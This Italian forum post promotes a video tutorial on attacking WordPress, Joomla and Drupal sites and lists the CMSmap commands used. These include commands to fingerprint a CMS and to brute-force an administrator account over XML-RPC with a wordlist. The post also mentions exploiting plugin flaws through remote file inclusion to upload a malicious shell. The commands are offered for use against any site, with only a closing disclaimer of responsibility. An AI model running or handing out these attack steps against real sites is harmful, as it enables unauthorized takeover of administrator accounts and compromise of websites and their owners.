Salve forum,

in questo video verrà illustrato come eseguire un attacco ai più famosi e conosciuti Content-Management-System, ovvero i servizi per meglio intenderci -Wordpress-Joomla-Drupal, con i quali è possibili creare,amministrare e modificare pagine e siti web, senza conoscere un' h sulla programmazione.
Servizi di tale genere sono molto comodi, ma ormai sempre più spesso sono afflitti da vulnerabilità.
Nel video vedremo come eseguire un attacco bruteforce a Wordpress su una pagina vulnerabile all'XML-RPC brute force, per trovare le credenziali di amministratore del sito...
Ma in altri siti addirittura, è possibile che vengano trovati in automatico alcune vulnerabilità dovute ai plugin installati nel sito ed exploitabili con un Remote File Inclusion uploadando una shell maligna nel sito...
Non aggiungo altro, buona visione e buon lavoro!

http://www.dailymotion.com/video/x3odrpt_hackerare-cms-wordpress-joomla-drupal-cmsmap_tech

Comandi utilizzati nel video:

Codice: Seleziona tutto

Comandi utilizzati nel video: 
------------------------------------------------------------------------------- 
python cmsmap.py -t http://sito.it -F 

Parametro -F opzionale, a volte non consigliato 
Per forzare la rilevazione di un CMS: 

python cmsmap.py -t http://sito.it -f W/j/D -F 

Dove W/J/D (stanno rispettivamente per Wordpress o Joomla o Drupal) 
------------------------------------------------------------------------------- 
Bruteforce XML-RPC account: 

python cmsmap.py -t http://sito.it -u nome_account -p /percorso/wordlist.txt -v 

Nel caso in cui è stato forzato il rilevamento con il parametro -f, inserirlo nuovamente: 

python cmsmap.py -t http://sito.it -u nome_account -p /percorso/wordlist.txt -f W/J/D -v 
Se vuoi installare CMSMAP tra i tool della tua distro potendolo avviare semplicemente digitando il suo nome senza eseguirlo dalla sua cartella ogni volta:

Codice: Seleziona tutto

mv cmsmap /usr/bin/cmsmap
Download CMSMAP
 ! Messaggio da: Virgula
Attenzione!

Non mi avvalgo della responsabilità dei danni che potreste causare con le informazioni riportate nel video.
Usa questa guida per puro scopo informativo e per una cultura personale sulle vulnerabilità che affliggono il web!.

Grazie